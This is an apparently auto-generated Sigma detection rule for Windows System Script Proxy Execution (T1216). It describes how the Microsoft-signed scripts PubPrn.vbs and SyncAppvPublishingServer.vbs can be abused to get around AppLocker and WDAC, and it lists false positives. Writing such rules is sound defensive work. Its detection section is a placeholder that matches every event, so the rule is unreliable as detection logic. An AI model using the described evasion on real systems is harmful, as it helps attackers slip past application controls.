title: System Script Proxy Execution (T1216)
id: df00tech-t1216
status: experimental
description: "Adversaries may use trusted scripts, often signed with Microsoft certificates, to proxy the execution of malicious files. Several Microsoft-signed scripts that ship with Windows or are downloadable from Microsoft can be abused to proxy execution of attacker-controlled content. Primary sub-techniques include PubPrn.vbs (a printer publishing script that accepts a 'script:' COM scriptlet URL as its second argument) and SyncAppvPublishingServer.vbs/exe (an App-V publishing script that passes arguments directly to a PowerShell pipeline). Because these scripts are signed by Microsoft, they may bypass application control policies (AppLocker, WDAC) that trust Microsoft-signed content, and they evade script-based detection that focuses on unsigned or unknown interpreters. The technique falls under Defense Evasion, making it a common component of initial access payloads and post-exploitation tooling."
references:
  - https://attack.mitre.org/techniques/T1216/
  - https://df00tech.com/detections/T1216
author: df00tech
date: 2026/04/13
tags:
  - attack.t1216
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Legitimate printer publishing operations using PubPrn.vbs in enterprise printing environments — typically invoked by print administrators against a known print server, not a remote HTTP/HTTPS URL"
  - App-V publishing infrastructure running SyncAppvPublishingServer.vbs/exe as part of scheduled application virtualization refresh — verify the server and account are expected in your App-V deployment
  - Security testing tools or red team exercises explicitly using LOLBAS scripts in an authorized penetration test — correlate with change management tickets
  - Software packaging scripts that invoke cscript.exe against Microsoft-signed VBScripts during application installation — check if the parent process is a trusted installer
level: high